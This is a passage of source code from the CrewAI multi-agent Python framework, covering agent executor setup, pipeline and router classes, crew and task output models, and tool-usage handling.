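        task-execution prompt, the llm bound with stop words, and the
        CrewAgentParser are piped into a RunnableAgent, which is then wrapped in
        a CrewAgentExecutor configured with the iteration, time, and RPM limits.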
""" tools = tools or self.tools or [] agent_args = { "input": lambda x: x["input"], "tools": lambda x: x["tools"], "tool_names": lambda x: x["tool_names"], "agent_scratchpad": lambda x: self.format_log_to_str( x["intermediate_steps"] ), } executor_args = { "llm": self.llm, "i18n": self.i18n, "crew": self.crew, "crew_agent": self, "tools": self._parse_tools(tools), "verbose": self.verbose, "original_tools": tools, "handle_parsing_errors": True, "max_iterations": self.max_iter, "max_execution_time": self.max_execution_time, "step_callback": self.step_callback, "tools_handler": self.tools_handler, "function_calling_llm": self.function_calling_llm, "callbacks": self.callbacks, "max_tokens": self.max_tokens, } if self._rpm_controller: executor_args["request_within_rpm_limit"] = ( self._rpm_controller.check_or_wait ) prompt = Prompts( i18n=self.i18n, tools=tools, system_template=self.system_template, prompt_template=self.prompt_template, response_template=self.response_template, ).task_execution() execution_prompt = prompt.partial( goal=self.goal, role=self.role, backstory=self.backstory, ) stop_words = [self.i18n.slice("observation")] if self.response_template: stop_words.append( self.response_template.split("{{ .Response }}")[1].strip() ) bind = self.llm.bind(stop=stop_words) inner_agent = agent_args | execution_prompt | bind | CrewAgentParser(agent=self) self.agent_executor = CrewAgentExecutor( agent=RunnableAgent(runnable=inner_agent), **executor_args ) def get_delegation_tools(self, agents: List[BaseAgent]): agent_tools = AgentTools(agents=agents) tools = agent_tools.tools() return tools def get_code_execution_tools(self): try: from crewai_tools import CodeInterpreterTool return [CodeInterpreterTool()] except ModuleNotFoundError: self._logger.log( "info", "Coding tools not available. Install crewai_tools. " ) def get_output_converter(self, llm, text, model, instructions): return Converter(llm=llm, text=text, model=model, instructions=instructions) def _parse_tools(self, tools: List[Any]) -> List[LangChainTool]: # type: ignore # Function "langchain_core.tools.tool" is not valid as a type """Parse tools to be used for the task.""" tools_list = [] try: # tentatively try to import from crewai_tools import BaseTool as CrewAITool from crewai_tools import BaseTool as CrewAITool for tool in tools: if isinstance(tool, CrewAITool): tools_list.append(tool.to_langchain()) else: tools_list.append(tool) except ModuleNotFoundError: tools_list = [] for tool in tools: tools_list.append(tool) return tools_list def _training_handler(self, task_prompt: str) -> str: """Handle training data for the agent task prompt to improve output on Training.""" if data := CrewTrainingHandler(TRAINING_DATA_FILE).load(): agent_id = str(self.id) if data.get(agent_id): human_feedbacks = [ i["human_feedback"] for i in data.get(agent_id, {}).values() ] task_prompt += "You MUST follow these feedbacks: \n " + "\n - ".join( human_feedbacks ) return task_prompt def _use_trained_data(self, task_prompt: str) -> str: """Use trained data for the agent task prompt to improve output.""" if data := CrewTrainingHandler(TRAINED_AGENTS_DATA_FILE).load(): if trained_data_output := data.get(self.role): task_prompt += "You MUST follow these feedbacks: \n " + "\n - ".join( trained_data_output["suggestions"] ) return task_prompt def _render_text_description(self, tools: List[BaseTool]) -> str: """Render the tool name and description in plain text. Output will be in the format of: .. 
code-block:: markdown search: This tool is used for search calculator: This tool is used for math """ description = "\n".join( [ f"Tool name: {tool.name}\nTool description:\n{tool.description}" for tool in tools ] ) return description def _render_text_description_and_args(self, tools: List[BaseTool]) -> str: """Render the tool name, description, and args in plain text. Output will be in the format of: .. code-block:: markdown search: This tool is used for search, args: {"query": {"type": "string"}} calculator: This tool is used for math, \ args: {"expression": {"type": "string"}} """ tool_strings = [] for tool in tools: args_schema = str(tool.args) if hasattr(tool, "func") and tool.func: sig = signature(tool.func) description = ( f"Tool Name: {tool.name}{sig}\nTool Description: {tool.description}" ) else: description = ( f"Tool Name: {tool.name}\nTool Description: {tool.description}" ) tool_strings.append(f"{description}\nTool Arguments: {args_schema}") return "\n".join(tool_strings) @staticmethod def __tools_names(tools) -> str: return ", ".join([t.name for t in tools]) def __repr__(self): return f"Agent(role={self.role}, goal={self.goal}, backstory={self.backstory})" File: src/crewai/process.py from enum import Enum class Process(str, Enum): """ Class representing the different processes that can be used to tackle tasks """ sequential = "sequential" hierarchical = "hierarchical" # TODO: consensual = 'consensual' File: src/crewai/routers/__init__.py from crewai.routers.router import Router __all__ = ["Router"] File: src/crewai/routers/router.py from copy import deepcopy from typing import Any, Callable, Dict, Tuple from pydantic import BaseModel, Field, PrivateAttr class Route(BaseModel): condition: Callable[[Dict[str, Any]], bool] pipeline: Any class Router(BaseModel): routes: Dict[str, Route] = Field( default_factory=dict, description="Dictionary of route names to (condition, pipeline) tuples", ) default: Any = Field(..., description="Default pipeline if no conditions are met") _route_types: Dict[str, type] = PrivateAttr(default_factory=dict) class Config: arbitrary_types_allowed = True def __init__(self, routes: Dict[str, Route], default: Any, **data): super().__init__(routes=routes, default=default, **data) self._check_copyable(default) for name, route in routes.items(): self._check_copyable(route.pipeline) self._route_types[name] = type(route.pipeline) @staticmethod def _check_copyable(obj: Any) -> None: if not hasattr(obj, "copy") or not callable(getattr(obj, "copy")): raise ValueError(f"Object of type {type(obj)} must have a 'copy' method") def add_route( self, name: str, condition: Callable[[Dict[str, Any]], bool], pipeline: Any, ) -> "Router": """ Add a named route with its condition and corresponding pipeline to the router. Args: name: A unique name for this route condition: A function that takes a dictionary input and returns a boolean pipeline: The Pipeline to execute if the condition is met Returns: The Router instance for method chaining """ self._check_copyable(pipeline) self.routes[name] = Route(condition=condition, pipeline=pipeline) self._route_types[name] = type(pipeline) return self def route(self, input_data: Dict[str, Any]) -> Tuple[Any, str]: """ Evaluate the input against the conditions and return the appropriate pipeline. 
Args: input_data: The input dictionary to be evaluated Returns: A tuple containing the next Pipeline to be executed and the name of the route taken """ for name, route in self.routes.items(): if route.condition(input_data): return route.pipeline, name return self.default, "default" def copy(self) -> "Router": """Create a deep copy of the Router.""" new_routes = { name: Route( condition=deepcopy(route.condition), pipeline=route.pipeline.copy(), ) for name, route in self.routes.items() } new_default = self.default.copy() return Router(routes=new_routes, default=new_default) File: src/crewai/pipeline/pipeline_output.py import uuid from typing import List from pydantic import UUID4, BaseModel, Field from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult class PipelineOutput(BaseModel): id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) run_results: List[PipelineKickoffResult] = Field( description="List of results for each run through the pipeline", default=[] ) def add_run_result(self, result: PipelineKickoffResult): self.run_results.append(result) File: src/crewai/pipeline/__init__.py from crewai.pipeline.pipeline import Pipeline from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult from crewai.pipeline.pipeline_output import PipelineOutput __all__ = ["Pipeline", "PipelineKickoffResult", "PipelineOutput"] File: src/crewai/pipeline/pipeline.py import asyncio import copy from typing import Any, Dict, List, Tuple, Union from pydantic import BaseModel, Field, model_validator from crewai.crew import Crew from crewai.crews.crew_output import CrewOutput from crewai.pipeline.pipeline_kickoff_result import PipelineKickoffResult from crewai.routers.router import Router from crewai.types.usage_metrics import UsageMetrics Trace = Union[Union[str, Dict[str, Any]], List[Union[str, Dict[str, Any]]]] PipelineStage = Union[Crew, List[Crew], Router] """ Developer Notes: This module defines a Pipeline class that represents a sequence of operations (stages) to process inputs. Each stage can be either sequential or parallel, and the pipeline can process multiple kickoffs concurrently. Core Loop Explanation: 1. The `process_kickoffs` method processes multiple kickoffs in parallel, each going through all pipeline stages. 2. The `process_single_kickoff` method handles the processing of a single kickouff through all stages, updating metrics and input data along the way. 3. The `_process_stage` method determines whether a stage is sequential or parallel and processes it accordingly. 4. The `_process_single_crew` and `_process_parallel_crews` methods handle the execution of single and parallel crew stages. 5. The `_update_metrics_and_input` method updates usage metrics and the current input with the outputs from a stage. 6. The `_build_pipeline_kickoff_results` method constructs the final results of the pipeline kickoff, including traces and outputs. Handling Traces and Crew Outputs: - During the processing of stages, we handle the results (traces and crew outputs) for all stages except the last one differently from the final stage. - For intermediate stages, the primary focus is on passing the input data between stages. This involves merging the output dictionaries from all crews in a stage into a single dictionary and passing it to the next stage. This merged dictionary allows for smooth data flow between stages. 
- For the final stage, in addition to passing the input data, we also need to prepare the final outputs and traces to be returned as the overall result of the pipeline kickoff. In this case, we do not merge the results, as each result needs to be included separately in its own pipeline kickoff result. Pipeline Terminology: - Pipeline: The overall structure that defines a sequence of operations. - Stage: A distinct part of the pipeline, which can be either sequential or parallel. - Kickoff: A specific execution of the pipeline for a given set of inputs, representing a single instance of processing through the pipeline. - Branch: Parallel executions within a stage (e.g., concurrent crew operations). - Trace: The journey of an individual input through the entire pipeline. Example pipeline structure: crew1 >> crew2 >> crew3 This represents a pipeline with three sequential stages: 1. crew1 is the first stage, which processes the input and passes its output to crew2. 2. crew2 is the second stage, which takes the output from crew1 as its input, processes it, and passes its output to crew3. 3. crew3 is the final stage, which takes the output from crew2 as its input and produces the final output of the pipeline. Each input creates its own kickoff, flowing through all stages of the pipeline. Multiple kickoffss can be processed concurrently, each following the defined pipeline structure. Another example pipeline structure: crew1 >> [crew2, crew3] >> crew4 This represents a pipeline with three stages: 1. A sequential stage (crew1) 2. A parallel stage with two branches (crew2 and crew3 executing concurrently) 3. Another sequential stage (crew4) Each input creates its own kickoff, flowing through all stages of the pipeline. Multiple kickoffs can be processed concurrently, each following the defined pipeline structure. """ class Pipeline(BaseModel): stages: List[PipelineStage] = Field( ..., description="List of crews representing stages to be executed in sequence" ) @model_validator(mode="before") @classmethod def validate_stages(cls, values): stages = values.get("stages", []) def check_nesting_and_type(item, depth=0): if depth > 1: raise ValueError("Double nesting is not allowed in pipeline stages") if isinstance(item, list): for sub_item in item: check_nesting_and_type(sub_item, depth + 1) elif not isinstance(item, (Crew, Router)): raise ValueError( f"Expected Crew instance, Router instance, or list of Crews, got {type(item)}" ) for stage in stages: check_nesting_and_type(stage) return values async def kickoff( self, inputs: List[Dict[str, Any]] ) -> List[PipelineKickoffResult]: """ Processes multiple runs in parallel, each going through all pipeline stages. Args: inputs (List[Dict[str, Any]]): List of inputs for each run. Returns: List[PipelineKickoffResult]: List of results from each run. """ pipeline_results: List[PipelineKickoffResult] = [] # Process all runs in parallel all_run_results = await asyncio.gather( *(self.process_single_kickoff(input_data) for input_data in inputs) ) # Flatten the list of lists into a single list of results pipeline_results.extend( result for run_result in all_run_results for result in run_result ) return pipeline_results async def process_single_kickoff( self, kickoff_input: Dict[str, Any] ) -> List[PipelineKickoffResult]: """ Processes a single run through all pipeline stages. Args: input (Dict[str, Any]): The input for the run. Returns: List[PipelineKickoffResult]: The results of processing the run. 
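
        Note (behavior summary based on the loop below): when a stage is a
        Router, the selected pipeline's stages are spliced into the remaining
        stage list and a ``{"route_taken": <route name>}`` entry is appended to
        the trace before execution continues with the next stage.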
""" initial_input = copy.deepcopy(kickoff_input) current_input = copy.deepcopy(kickoff_input) stages = self._copy_stages() pipeline_usage_metrics: Dict[str, UsageMetrics] = {} all_stage_outputs: List[List[CrewOutput]] = [] traces: List[List[Union[str, Dict[str, Any]]]] = [[initial_input]] stage_index = 0 while stage_index < len(stages): stage = stages[stage_index] stage_input = copy.deepcopy(current_input) if isinstance(stage, Router): next_pipeline, route_taken = stage.route(stage_input) stages = ( stages[: stage_index + 1] + list(next_pipeline.stages) + stages[stage_index + 1 :] ) traces.append([{"route_taken": route_taken}]) stage_index += 1 continue stage_outputs, stage_trace = await self._process_stage(stage, stage_input) self._update_metrics_and_input( pipeline_usage_metrics, current_input, stage, stage_outputs ) traces.append(stage_trace) all_stage_outputs.append(stage_outputs) stage_index += 1 return self._build_pipeline_kickoff_results( all_stage_outputs, traces, pipeline_usage_metrics ) async def _process_stage( self, stage: PipelineStage, current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes a single stage of the pipeline, which can be either sequential or parallel. Args: stage (Union[Crew, List[Crew]]): The stage to process. current_input (Dict[str, Any]): The input for the stage. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The outputs and trace of the stage. """ if isinstance(stage, Crew): return await self._process_single_crew(stage, current_input) elif isinstance(stage, list) and all(isinstance(crew, Crew) for crew in stage): return await self._process_parallel_crews(stage, current_input) else: raise ValueError(f"Unsupported stage type: {type(stage)}") async def _process_single_crew( self, crew: Crew, current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes a single crew. Args: crew (Crew): The crew to process. current_input (Dict[str, Any]): The input for the crew. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The output and trace of the crew. """ output = await crew.kickoff_async(inputs=current_input) return [output], [crew.name or str(crew.id)] async def _process_parallel_crews( self, crews: List[Crew], current_input: Dict[str, Any] ) -> Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: """ Processes multiple crews in parallel. Args: crews (List[Crew]): The list of crews to process in parallel. current_input (Dict[str, Any]): The input for the crews. Returns: Tuple[List[CrewOutput], List[Union[str, Dict[str, Any]]]]: The outputs and traces of the crews. """ parallel_outputs = await asyncio.gather( *[crew.kickoff_async(inputs=current_input) for crew in crews] ) return parallel_outputs, [crew.name or str(crew.id) for crew in crews] def _update_metrics_and_input( self, usage_metrics: Dict[str, UsageMetrics], current_input: Dict[str, Any], stage: PipelineStage, outputs: List[CrewOutput], ) -> None: """ Updates metrics and current input with the outputs of a stage. Args: usage_metrics (Dict[str, Any]): The usage metrics to update. current_input (Dict[str, Any]): The current input to update. stage (Union[Crew, List[Crew]]): The stage that was processed. outputs (List[CrewOutput]): The outputs of the stage. 
""" if isinstance(stage, Crew): usage_metrics[stage.name or str(stage.id)] = outputs[0].token_usage current_input.update(outputs[0].to_dict()) elif isinstance(stage, list) and all(isinstance(crew, Crew) for crew in stage): for crew, output in zip(stage, outputs): usage_metrics[crew.name or str(crew.id)] = output.token_usage current_input.update(output.to_dict()) else: raise ValueError(f"Unsupported stage type: {type(stage)}") def _build_pipeline_kickoff_results( self, all_stage_outputs: List[List[CrewOutput]], traces: List[List[Union[str, Dict[str, Any]]]], token_usage: Dict[str, UsageMetrics], ) -> List[PipelineKickoffResult]: """ Builds the results of a pipeline run. Args: all_stage_outputs (List[List[CrewOutput]]): All stage outputs. traces (List[List[Union[str, Dict[str, Any]]]]): All traces. token_usage (Dict[str, Any]): Token usage metrics. Returns: List[PipelineKickoffResult]: The results of the pipeline run. """ formatted_traces = self._format_traces(traces) formatted_crew_outputs = self._format_crew_outputs(all_stage_outputs) return [ PipelineKickoffResult( token_usage=token_usage, trace=formatted_trace, raw=crews_outputs[-1].raw, pydantic=crews_outputs[-1].pydantic, json_dict=crews_outputs[-1].json_dict, crews_outputs=crews_outputs, ) for crews_outputs, formatted_trace in zip( formatted_crew_outputs, formatted_traces ) ] def _format_traces( self, traces: List[List[Union[str, Dict[str, Any]]]] ) -> List[List[Trace]]: """ Formats the traces of a pipeline run. Args: traces (List[List[Union[str, Dict[str, Any]]]]): The traces to format. Returns: List[List[Trace]]: The formatted traces. """ formatted_traces: List[Trace] = self._format_single_trace(traces[:-1]) return self._format_multiple_traces(formatted_traces, traces[-1]) def _format_single_trace( self, traces: List[List[Union[str, Dict[str, Any]]]] ) -> List[Trace]: """ Formats single traces. Args: traces (List[List[Union[str, Dict[str, Any]]]]): The traces to format. Returns: List[Trace]: The formatted single traces. """ formatted_traces: List[Trace] = [] for trace in traces: formatted_traces.append(trace[0] if len(trace) == 1 else trace) return formatted_traces def _format_multiple_traces( self, formatted_traces: List[Trace], final_trace: List[Union[str, Dict[str, Any]]], ) -> List[List[Trace]]: """ Formats multiple traces. Args: formatted_traces (List[Trace]): The formatted single traces. final_trace (List[Union[str, Dict[str, Any]]]): The final trace to format. Returns: List[List[Trace]]: The formatted multiple traces. """ traces_to_return: List[List[Trace]] = [] if len(final_trace) == 1: formatted_traces.append(final_trace[0]) traces_to_return.append(formatted_traces) else: for trace in final_trace: copied_traces = formatted_traces.copy() copied_traces.append(trace) traces_to_return.append(copied_traces) return traces_to_return def _format_crew_outputs( self, all_stage_outputs: List[List[CrewOutput]] ) -> List[List[CrewOutput]]: """ Formats the outputs of all stages into a list of crew outputs. Args: all_stage_outputs (List[List[CrewOutput]]): All stage outputs. Returns: List[List[CrewOutput]]: Formatted crew outputs. 
""" crew_outputs: List[CrewOutput] = [ output for stage_outputs in all_stage_outputs[:-1] for output in stage_outputs ] return [crew_outputs + [output] for output in all_stage_outputs[-1]] def _copy_stages(self): """Create a deep copy of the Pipeline's stages.""" new_stages = [] for stage in self.stages: if isinstance(stage, list): new_stages.append( [ crew.copy() if hasattr(crew, "copy") else copy.deepcopy(crew) for crew in stage ] ) elif hasattr(stage, "copy"): new_stages.append(stage.copy()) else: new_stages.append(copy.deepcopy(stage)) return new_stages def __rshift__(self, other: PipelineStage) -> "Pipeline": """ Implements the >> operator to add another Stage (Crew or List[Crew]) to an existing Pipeline. Args: other (Any): The stage to add. Returns: Pipeline: A new pipeline with the added stage. """ if isinstance(other, (Crew, Router)) or ( isinstance(other, list) and all(isinstance(item, Crew) for item in other) ): return type(self)(stages=self.stages + [other]) else: raise TypeError( f"Unsupported operand type for >>: '{type(self).__name__}' and '{type(other).__name__}'" ) File: src/crewai/pipeline/pipeline_kickoff_result.py import json import uuid from typing import Any, Dict, List, Optional, Union from pydantic import UUID4, BaseModel, Field from crewai.crews.crew_output import CrewOutput from crewai.types.usage_metrics import UsageMetrics class PipelineKickoffResult(BaseModel): """Class that represents the result of a pipeline run.""" id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) raw: str = Field(description="Raw output of the pipeline run", default="") pydantic: Any = Field( description="Pydantic output of the pipeline run", default=None ) json_dict: Union[Dict[str, Any], None] = Field( description="JSON dict output of the pipeline run", default={} ) token_usage: Dict[str, UsageMetrics] = Field( description="Token usage for each crew in the run" ) trace: List[Any] = Field( description="Trace of the journey of inputs through the run" ) crews_outputs: List[CrewOutput] = Field( description="Output from each crew in the run", default=[], ) @property def json(self) -> Optional[str]: if self.crews_outputs[-1].tasks_output[-1].output_format != "json": raise ValueError( "No JSON output found in the final task of the final crew. Please make sure to set the output_json property in the final task in your crew." 
            )
        return json.dumps(self.json_dict)

    def to_dict(self) -> Dict[str, Any]:
        """Convert json_output and pydantic_output to a dictionary."""
        output_dict = {}
        if self.json_dict:
            output_dict.update(self.json_dict)
        elif self.pydantic:
            output_dict.update(self.pydantic.model_dump())
        return output_dict

    def __str__(self):
        if self.pydantic:
            return str(self.pydantic)
        if self.json_dict:
            return str(self.json_dict)
        return self.raw


File: src/crewai/crews/__init__.py

from .crew_output import CrewOutput

__all__ = ["CrewOutput"]


File: src/crewai/crews/crew_output.py

import json
from typing import Any, Dict, Optional

from pydantic import BaseModel, Field

from crewai.tasks.output_format import OutputFormat
from crewai.tasks.task_output import TaskOutput
from crewai.types.usage_metrics import UsageMetrics


class CrewOutput(BaseModel):
    """Class that represents the result of a crew."""

    raw: str = Field(description="Raw output of crew", default="")
    pydantic: Optional[BaseModel] = Field(
        description="Pydantic output of Crew", default=None
    )
    json_dict: Optional[Dict[str, Any]] = Field(
        description="JSON dict output of Crew", default=None
    )
    tasks_output: list[TaskOutput] = Field(
        description="Output of each task", default=[]
    )
    token_usage: UsageMetrics = Field(description="Processed token summary", default={})

    @property
    def json(self) -> Optional[str]:
        if self.tasks_output[-1].output_format != OutputFormat.JSON:
            raise ValueError(
                "No JSON output found in the final task. Please make sure to set the output_json property in the final task in your crew."
            )

        return json.dumps(self.json_dict)

    def to_dict(self) -> Dict[str, Any]:
        """Convert json_output and pydantic_output to a dictionary."""
        output_dict = {}
        if self.json_dict:
            output_dict.update(self.json_dict)
        elif self.pydantic:
            output_dict.update(self.pydantic.model_dump())
        return output_dict

    def __str__(self):
        if self.pydantic:
            return str(self.pydantic)
        if self.json_dict:
            return str(self.json_dict)
        return self.raw


File: src/crewai/tasks/__init__.py

from crewai.tasks.output_format import OutputFormat
from crewai.tasks.task_output import TaskOutput

__all__ = ["OutputFormat", "TaskOutput"]


File: src/crewai/tasks/conditional_task.py

from typing import Any, Callable

from pydantic import Field

from crewai.task import Task
from crewai.tasks.output_format import OutputFormat
from crewai.tasks.task_output import TaskOutput


class ConditionalTask(Task):
    """
    A task that can be conditionally executed based on the output of another task.
    Note: This cannot be the only task you have in your crew and cannot be the first
    since it needs context from the previous task.
    """

    condition: Callable[[TaskOutput], bool] = Field(
        default=None,
        description="Callable that evaluates the previous task's output and returns True if this task should be executed.",
    )

    def __init__(
        self,
        condition: Callable[[Any], bool],
        **kwargs,
    ):
        super().__init__(**kwargs)
        self.condition = condition

    def should_execute(self, context: TaskOutput) -> bool:
        """
        Determines whether the conditional task should be executed based on the provided context.

        Args:
            context (Any): The context or output from the previous task that will be evaluated by the condition.

        Returns:
            bool: True if the task should be executed, False otherwise.
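
        Example (illustrative sketch; assumes the usual Task fields plus a
        hypothetical ``publisher`` agent and ``previous_task_output``):

            gate = ConditionalTask(
                description="Publish the article only if it was approved.",
                expected_output="Confirmation that the article was published.",
                agent=publisher,
                condition=lambda output: "APPROVED" in output.raw,
            )
            gate.should_execute(previous_task_output)  # True only when the marker is present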
""" return self.condition(context) def get_skipped_task_output(self): return TaskOutput( description=self.description, raw="", agent=self.agent.role if self.agent else "", output_format=OutputFormat.RAW, ) File: src/crewai/tasks/output_format.py from enum import Enum class OutputFormat(str, Enum): """Enum that represents the output format of a task.""" JSON = "json" PYDANTIC = "pydantic" RAW = "raw" File: src/crewai/tasks/task_output.py import json from typing import Any, Dict, Optional from pydantic import BaseModel, Field, model_validator from crewai.tasks.output_format import OutputFormat class TaskOutput(BaseModel): """Class that represents the result of a task.""" description: str = Field(description="Description of the task") name: Optional[str] = Field(description="Name of the task", default=None) expected_output: Optional[str] = Field( description="Expected output of the task", default=None ) summary: Optional[str] = Field(description="Summary of the task", default=None) raw: str = Field(description="Raw output of the task", default="") pydantic: Optional[BaseModel] = Field( description="Pydantic output of task", default=None ) json_dict: Optional[Dict[str, Any]] = Field( description="JSON dictionary of task", default=None ) agent: str = Field(description="Agent that executed the task") output_format: OutputFormat = Field( description="Output format of the task", default=OutputFormat.RAW ) @model_validator(mode="after") def set_summary(self): """Set the summary field based on the description.""" excerpt = " ".join(self.description.split(" ")[:10]) self.summary = f"{excerpt}..." return self @property def json(self) -> Optional[str]: if self.output_format != OutputFormat.JSON: raise ValueError( """ Invalid output format requested. If you would like to access the JSON output, please make sure to set the output_json property for the task """ ) return json.dumps(self.json_dict) def to_dict(self) -> Dict[str, Any]: """Convert json_output and pydantic_output to a dictionary.""" output_dict = {} if self.json_dict: output_dict.update(self.json_dict) elif self.pydantic: output_dict.update(self.pydantic.model_dump()) return output_dict def __str__(self) -> str: if self.pydantic: return str(self.pydantic) if self.json_dict: return str(self.json_dict) return self.raw File: src/crewai/tools/cache_tools.py from langchain.tools import StructuredTool from pydantic import BaseModel, Field from crewai.agents.cache import CacheHandler class CacheTools(BaseModel): """Default tools to hit the cache.""" name: str = "Hit Cache" cache_handler: CacheHandler = Field( description="Cache Handler for the crew", default_factory=CacheHandler, ) def tool(self): return StructuredTool.from_function( func=self.hit_cache, name=self.name, description="Reads directly from the cache", ) def hit_cache(self, key): split = key.split("tool:") tool = split[1].split("|input:")[0].strip() tool_input = split[1].split("|input:")[1].strip() return self.cache_handler.read(tool, tool_input) File: src/crewai/tools/__init__.py File: src/crewai/tools/tool_output_parser.py import json from typing import Any, List import regex from langchain.output_parsers import PydanticOutputParser from langchain_core.exceptions import OutputParserException from langchain_core.outputs import Generation from pydantic import ValidationError class ToolOutputParser(PydanticOutputParser): """Parses the function calling of a tool usage and it's arguments.""" def parse_result(self, result: List[Generation], *, partial: bool = False) -> Any: result[0].text = 
self._transform_in_valid_json(result[0].text) json_object = super().parse_result(result) try: return self.pydantic_object.parse_obj(json_object) except ValidationError as e: name = self.pydantic_object.__name__ msg = f"Failed to parse {name} from completion {json_object}. Got: {e}" raise OutputParserException(msg, llm_output=json_object) def _transform_in_valid_json(self, text) -> str: text = text.replace("```", "").replace("json", "") json_pattern = r"\{(?:[^{}]|(?R))*\}" matches = regex.finditer(json_pattern, text) for match in matches: try: # Attempt to parse the matched string as JSON json_obj = json.loads(match.group()) # Return the first successfully parsed JSON object json_obj = json.dumps(json_obj) return str(json_obj) except json.JSONDecodeError: # If parsing fails, skip to the next match continue return text File: src/crewai/tools/tool_usage.py import ast import os from difflib import SequenceMatcher from textwrap import dedent from typing import Any, List, Union from langchain_core.tools import BaseTool from langchain_openai import ChatOpenAI from crewai.agents.tools_handler import ToolsHandler from crewai.task import Task from crewai.telemetry import Telemetry from crewai.tools.tool_calling import InstructorToolCalling, ToolCalling from crewai.utilities import I18N, Converter, ConverterError, Printer agentops = None if os.environ.get("AGENTOPS_API_KEY"): try: import agentops # type: ignore except ImportError: pass OPENAI_BIGGER_MODELS = ["gpt-4o"] class ToolUsageErrorException(Exception): """Exception raised for errors in the tool usage.""" def __init__(self, message: str) -> None: self.message = message super().__init__(self.message) class ToolUsage: """ Class that represents the usage of a tool by an agent. Attributes: task: Task being executed. tools_handler: Tools handler that will manage the tool usage. tools: List of tools available for the agent. original_tools: Original tools available for the agent before being converted to BaseTool. tools_description: Description of the tools available for the agent. tools_names: Names of the tools available for the agent. function_calling_llm: Language model to be used for the tool usage. """ def __init__( self, tools_handler: ToolsHandler, tools: List[BaseTool], original_tools: List[Any], tools_description: str, tools_names: str, task: Task, function_calling_llm: Any, agent: Any, action: Any, ) -> None: self._i18n: I18N = I18N() self._printer: Printer = Printer() self._telemetry: Telemetry = Telemetry() self._run_attempts: int = 1 self._max_parsing_attempts: int = 3 self._remember_format_after_usages: int = 3 self.agent = agent self.tools_description = tools_description self.tools_names = tools_names self.tools_handler = tools_handler self.original_tools = original_tools self.tools = tools self.task = task self.action = action self.function_calling_llm = function_calling_llm # Handling bug (see https://github.com/langchain-ai/langchain/pull/16395): raise an error if tools_names have space for ChatOpenAI if isinstance(self.function_calling_llm, ChatOpenAI): if " " in self.tools_names: raise Exception( "Tools names should not have spaces for ChatOpenAI models." 
) # Set the maximum parsing attempts for bigger models if (isinstance(self.function_calling_llm, ChatOpenAI)) and ( self.function_calling_llm.openai_api_base is None ): if self.function_calling_llm.model_name in OPENAI_BIGGER_MODELS: self._max_parsing_attempts = 2 self._remember_format_after_usages = 4 def parse(self, tool_string: str): """Parse the tool string and return the tool calling.""" return self._tool_calling(tool_string) def use( self, calling: Union[ToolCalling, InstructorToolCalling], tool_string: str ) -> str: if isinstance(calling, ToolUsageErrorException): error = calling.message if self.agent.verbose: self._printer.print(content=f"\n\n{error}\n", color="red") self.task.increment_tools_errors() return error # BUG? The code below seems to be unreachable try: tool = self._select_tool(calling.tool_name) except Exception as e: error = getattr(e, "message", str(e)) self.task.increment_tools_errors() if self.agent.verbose: self._printer.print(content=f"\n\n{error}\n", color="red") return error return f"{self._use(tool_string=tool_string, tool=tool, calling=calling)}" # type: ignore # BUG?: "_use" of "ToolUsage" does not return a value (it only ever returns None) def _use( self, tool_string: str, tool: BaseTool, calling: Union[ToolCalling, InstructorToolCalling], ) -> str: # TODO: Fix this return type tool_event = agentops.ToolEvent(name=calling.tool_name) if agentops else None # type: ignore if self._check_tool_repeated_usage(calling=calling): # type: ignore # _check_tool_repeated_usage of "ToolUsage" does not return a value (it only ever returns None) try: result = self._i18n.errors("task_repeated_usage").format( tool_names=self.tools_names ) if self.agent.verbose: self._printer.print(content=f"\n\n{result}\n", color="purple") self._telemetry.tool_repeated_usage( llm=self.function_calling_llm, tool_name=tool.name, attempts=self._run_attempts, ) result = self._format_result(result=result) # type: ignore # "_format_result" of "ToolUsage" does not return a value (it only ever returns None) return result # type: ignore # Fix the return type of this function except Exception: self.task.increment_tools_errors() result = None # type: ignore # Incompatible types in assignment (expression has type "None", variable has type "str") if self.tools_handler.cache: result = self.tools_handler.cache.read( # type: ignore # Incompatible types in assignment (expression has type "str | None", variable has type "str") tool=calling.tool_name, input=calling.arguments ) original_tool = next( (ot for ot in self.original_tools if ot.name == tool.name), None ) if result is None: #! 
finecwg: if not result --> if result is None try: if calling.tool_name in [ "Delegate work to coworker", "Ask question to coworker", ]: coworker = ( calling.arguments.get("coworker") if calling.arguments else None ) self.task.increment_delegations(coworker) if calling.arguments: try: acceptable_args = tool.args_schema.schema()["properties"].keys() # type: ignore # Item "None" of "type[BaseModel] | None" has no attribute "schema" arguments = { k: v for k, v in calling.arguments.items() if k in acceptable_args } result = tool.invoke(input=arguments) except Exception: arguments = calling.arguments result = tool.invoke(input=arguments) else: result = tool.invoke(input={}) except Exception as e: self._run_attempts += 1 if self._run_attempts > self._max_parsing_attempts: self._telemetry.tool_usage_error(llm=self.function_calling_llm) error_message = self._i18n.errors("tool_usage_exception").format( error=e, tool=tool.name, tool_inputs=tool.description ) error = ToolUsageErrorException( f'\n{error_message}.\nMoving on then. {self._i18n.slice("format").format(tool_names=self.tools_names)}' ).message self.task.increment_tools_errors() if self.agent.verbose: self._printer.print( content=f"\n\n{error_message}\n", color="red" ) return error # type: ignore # No return value expected self.task.increment_tools_errors() if agentops: agentops.record( agentops.ErrorEvent(exception=e, trigger_event=tool_event) ) return self.use(calling=calling, tool_string=tool_string) # type: ignore # No return value expected if self.tools_handler: should_cache = True if ( hasattr(original_tool, "cache_function") and original_tool.cache_function # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" ): should_cache = original_tool.cache_function( # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" calling.arguments, result ) self.tools_handler.on_tool_use( calling=calling, output=result, should_cache=should_cache ) if self.agent.verbose: self._printer.print(content=f"\n\n{result}\n", color="purple") if agentops: agentops.record(tool_event) self._telemetry.tool_usage( llm=self.function_calling_llm, tool_name=tool.name, attempts=self._run_attempts, ) result = self._format_result(result=result) # type: ignore # "_format_result" of "ToolUsage" does not return a value 